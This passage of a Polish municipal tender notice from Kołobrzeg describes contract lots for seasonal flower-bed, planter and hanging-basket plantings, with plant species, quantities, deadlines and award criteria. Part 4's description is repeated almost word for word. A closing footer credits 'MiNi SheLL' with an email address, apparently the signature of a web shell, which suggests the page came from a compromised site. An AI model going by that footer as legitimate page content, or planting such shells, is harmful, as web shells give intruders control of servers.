i ul. Waryńskiego, w okolicy Regionalnego Centrum Kultury, na terenie Placu płk Anatola Przybylskiego, przy ul. Walki Młodych 17-20, przy ul. Katedralnej 1-5, przy ul. Łopuskiego 1-5, zlokalizowanych na terenie przy ul. Dworcowa 3, przy ul. Dworcowa 2-8, przy ul. Strzelecka 4, przy ul. Michała Drzymały 9-9a - łącznie 65 szt. gazonów, przy wykorzystaniu roślin gatunku Viola x wittrockiana..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie II letniej obsady rabat kwiatowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 element 1 - Wykonanie II letniej obsady rabat kwiatowych na terenie Skweru Miast Partnerskich (dz. nr 240 ob.12) -  5 kwietników o łącznej powierzchni 129,86 m2, przy wykorzystaniu szacunkowo łącznie 6 485 szt. roślin gatunku Begonia x semperflorens, Ageratum houstonianum, Tagetes patula, Część 2 element 2 - Wykonanie II letniej obsady rabat kwiatowych na terenie Parku  im. Stefana Żeromskiego (dz. nr 5/8 ob.4) u podnóża schodów Pomnika Zaślubin Polski z Morzem - o łącznej powierzchni 146,23 m2, przy wykorzystaniu szacunkowo łącznie min. 2 340  szt. roślin gatunku Impatiens New Guinea, Część 2 element 3 - Wykonanie II letniej obsady rabat kwiatowych na terenie Placu płk Anatola Przybylskiego (dz. nr 198 ob.12) - 2 kwietniki o łącznej powierzchni 242,21 m2, przy wykorzystaniu szacunkowo łącznie min. 8 878 szt. roślin gatunku Begonia x hybrida Dragon Wing, Begonia x semperflorens.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie II letniej obsady rabat kwiatowych na terenie Parku 18 Marca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 Wykonanie II letniej obsady rabat kwiatowych na terenie Parku 18 Marca (dz. nr 133 ob.12)- 6 kwietników o łącznej powierzchni 482,55 m2, przy wykorzystaniu szacunkowo łącznie min. 24 130  szt. roślin gatunku Coleus blumei lub Coleus hybryd odmiany o liściach jednolitych seledynowych, o liściach jednolitych  purpurowych oraz o liściach pstrych np. odm. Mosaic..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie II letniej obsady rabat kwiatowych na innych terenach zieleni miasta Kołobrzeg oraz wykonanie II letniej i jesiennej obsady gazonów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4 element 1 - Wykonanie II letniej obsady rabat kwiatowych na innych terenach zieleni miasta Kołobrzeg - łącznie 9 kwietników  o łącznej powierzchni 187,73 m2, przy wykorzystaniu szacunkowo łącznie min. 4500  szt. roślin gatunku  Canna generalia, Tagetes patula, Begonia tuberhybrida, Begonia  semperflorens, Ageratum houstonianum, Impatiens New Guinea, lub Impatiens waleriana,Część 4 element 2 - wykonanie II letniej i jesiennej obsady gazonów zlokalizowanych na terenach miasta Kołobrzeg, w tym na terenie przy głównym wejściu do Urzędu Miasta Kołobrzeg, na nadbrzeżu portowym przy ul. Morskiej, w Parku im. Stefana Żeromskiego, na terenie osiedla Podczele, przy skrzyżowaniu ul. Kniewskiego
 i ul. Waryńskiego, w okolicy Regionalnego Centrum Kultury, na terenie Placu płk Anatola Przybylskiego, przy ul. Walki Młodych 17-20, przy ul. Katedralnej 1-5, przy ul. Łopuskiego 1-5, zlokalizowanych na terenie przy ul. Dworcowa 3, przy ul. Dworcowa 2-8, przy ul. Strzelecka 4, przy ul. Michała Drzymały 9-9a - łącznie 76 szt. gazonów, przy wykorzystaniu roślin petunii kaskadowej 3 odmian, Pelargonium peltatum, Pelargonium zonale, Begonia tuberhybrida, Część 4 element 3 - Wykonanie nasadzeń kwiatowych w amplach wiszących zlokalizowanych na terenach miasta Kołobrzeg - Łącznie 57 szt. kompletów ampli przy wykorzystaniu szacunkowo łącznie min. 684 szt. roślin, stosując Begonię kaskadową  np. z grupy  Illumination czy z grupy Milion Kisses oraz stosując petunię kaskadową 3 odmian o niebieskim kolorze kwiatów, o czerwonym kolorze kwiatów oraz białym lub kremowym kolorze kwiatów,
Część 4 element 4 - Likwidacja kwietnika na terenie Skweru Miast Partnerskich oraz palisady  kwietnika zlokalizowanego na terenie Skweru Pana Tadeusza Część 4 element 5 - Wykonanie nasadzeń 685 krzewów róży okrywowej 2 odmian na terenie skweru zlokalizowanego przy skrzyżowaniu ul. E. Łopuskiego, Armii Krajowej  i ul. Dubois dz. nr 211 ob.12 oraz jej utrzymanie w okresie gwarancyjnym.
 Część 4 element 2 - wykonanie II letniej i jesiennej obsady gazonów zlokalizowanych na terenach miasta Kołobrzeg, w tym na terenie przy głównym wejściu do Urzędu Miasta Kołobrzeg, na nadbrzeżu portowym przy
 ul. Morskiej, w Parku im. Stefana Żeromskiego, na terenie osiedla Podczele, przy skrzyżowaniu ul. Kniewskiego i ul. Waryńskiego, w okolicy Regionalnego Centrum Kultury, na terenie Placu płk Anatola Przybylskiego, przy ul. Walki Młodych 17-20, przy ul. Katedralnej 1-5, przy ul. Łopuskiego 1-5, zlokalizowanych na terenie przy 
ul. Dworcowa 3, przy ul. Dworcowa 2-8, przy ul. Strzelecka 4, przy ul. Michała Drzymały 9-9a - łącznie 76 szt. gazonów, przy wykorzystaniu roślin petunii kaskadowej 3 odmian, Pelargonium peltatum, Pelargonium zonale, Begonia tuberhybrida, Część 4 element 3 - Wykonanie nasadzeń kwiatowych w amplach wiszących zlokalizowanych na terenach miasta Kołobrzeg - Łącznie 57 szt. kompletów ampli przy wykorzystaniu szacunkowo łącznie min. 684 szt. roślin, stosując Begonię kaskadową  np. z grupy  Illumination czy z grupy Milion Kisses oraz stosując petunię kaskadową 3 odmian o niebieskim kolorze kwiatów, o czerwonym kolorze kwiatów oraz białym lub kremowym kolorze kwiatów, Część 4 element 4 - Likwidacja kwietnika na terenie Skweru Miast Partnerskich oraz palisady  kwietnika zlokalizowanego na terenie Skweru Pana Tadeusza Część 4 element 5 - Wykonanie nasadzeń 685 krzewów róży okrywowej 2 odmian na terenie skweru zlokalizowanego przy skrzyżowaniu ul. E. Łopuskiego, Armii Krajowej  i ul. Dubois (dz. nr 211 ob.12) oraz jej utrzymanie w okresie gwarancyjnym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com